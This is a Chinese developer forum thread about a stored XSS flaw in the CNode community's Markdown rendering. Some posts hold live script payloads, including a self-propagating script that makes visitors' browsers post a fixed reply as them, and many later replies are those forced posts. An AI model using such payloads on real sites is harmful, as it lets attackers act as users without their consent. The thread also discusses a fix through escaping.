发现CNOD一个问题不知道是BUG还是特性？

imzshh 1楼•2年前

应该是bug，不知道@narutolby回复了什么。。。

jiyinyiyong 2楼•2年前

估计还是 script 标签的问题,

yetone 3楼•2年前

当用node.js做上一个正式项目以后，你们是否还会考虑用node.js?

为什么？

a272121742 4楼•2年前

这我和老吴早发现了，老吴已经上报了。这是有人看了老吴的文章之后，在cnode上做了实验，将一段代码注入到了服务器。在这个页面上通过调试界面可以清晰的看到被注入的代码。

darklowly 5楼•2年前

蛮厉害的哈，我没时间去细看。

jiyinyiyong 6楼•2年前

前面做了一个比较失败的修改, >_< 求大神啊… https://github.com/cnodejs/nodeclub/pull/75

我的思路是在 Markdown 编译前加上一句 makeHTML 把所有文本行的里 HTML 标记好浏览器端还没有尝试去改… 然后我写的那段脚本有点问题, 也不知道怎么具体测试, 阻塞了…

cony138 7楼•2年前

请楼主继续上次的讨论啊，介绍一下为啥不会再用node了，吐槽点在哪里？还望指出

a272121742 8楼•2年前

只痛恨有些人太无聊了

jiyinyiyong 9楼•2年前

@a272121742 主要是 Markdown 暴露出来的, 忘了标记就容易出事

leizongmin 10楼•2年前

````</p><script>alert('hello,world!');</script>
现在是个神马情况？

leizongmin 11楼•2年前

笑屎了，原来我也这么无聊~~~~

leizongmin 12楼•2年前

````</p>
<script>
(function () {
if (localStorage['___hasReply']) return;
localStorage['___hasReply'] = true;
setTimeout(function () {
$('#wmd-input').val('这个漏洞真是屌爆了~~~');
$('#submit_btn').click();
}, 3000);
})();
</script>

gxmari007 13楼•2年前

这个漏洞真是屌爆了~~~

gxmari007 14楼•2年前

这帖子也被注入了…我怎么会说这个漏洞碉堡了这种话…

darklowly 15楼•2年前

这个漏洞真是屌爆了~~~

atian25 16楼•2年前

这个漏洞真是屌爆了~~~

atian25 17楼•2年前

呃…这算是被发言了吗… 这个不是我说的…不过邮件通知好像没问题.

您好：

leizongmin 在话题发现CNOD一个问题不知道是BUG还是特性？中@了你。

若您没有在CNode社区填写过注册信息，说明有人滥用了您的电子邮箱，请删除此邮件，我们对给您造成的打扰感到抱歉。

CNode社区谨上。

xiaojue 18楼•2年前

这个漏洞真是屌爆了~~~

leizongmin 19楼•2年前

@atian25 这个问题很严重啊

atian25 20楼•2年前

@leizongmin 嗯,虽然是个玩具… 虽然人气不旺, 不过还是希望能尽快fix掉

jiyinyiyong 21楼•2年前

这个漏洞真是屌爆了~~~

jiyinyiyong 22楼•2年前

@leizongmin @我了? 求 fix @…@

darklowly 23楼•2年前

这条主题是我在 cnode社区发布的所有主题中回复最高的一个。看来大家都对这类问题有兴趣哈。

gxmari007 24楼•2年前

这个漏洞真是屌爆了~~~

gxmari007 25楼•2年前

能不高么进来就被回复，感觉就像被强奸似的

darklowly 26楼•2年前

@gxmari007 让回复来得更猛烈些吧

leizongmin 27楼•2年前

这个漏洞真是屌爆了~~~

leizongmin 28楼•2年前

@jiyinyiyong 我还没弄清楚怎么XSS啊，如何fix？

leizongmin 29楼•2年前

skyblue 30楼•2年前

这个漏洞真是屌爆了~~~

a272121742 31楼•2年前

这个漏洞真是屌爆了~~~

a272121742 32楼•2年前

靠啊，谁那么无聊啊，弹就算了，还循环的弹

DoubleSpout 33楼•2年前

这个漏洞真是屌爆了~~~

DoubleSpout 34楼•2年前

CXRF都不阻止下，哎，管理员无所作为，真要等到漫天的alert关站才罢休么

jiyinyiyong 35楼•2年前

这个漏洞真是屌爆了~~~

zelome 36楼•2年前

这个漏洞真是屌爆了~~~

jiyinyiyong 37楼•2年前

@leizongmin 原理大致上是网页上的 <script> 没被转换成 HTML 符号, 那么在服务器上就是加一层操作把内容, 把 Markdown 不会去标记的那部分里面的 <> 全部转成 > <… 虽然不太完善, 但是有一部分是能解决的, 至少加载页面时候不会执行 JS… 貌似我的脚本不完善, 而且不知道怎么写测试, 求支援啊, 链接: https://github.com/cnodejs/nodeclub/pull/75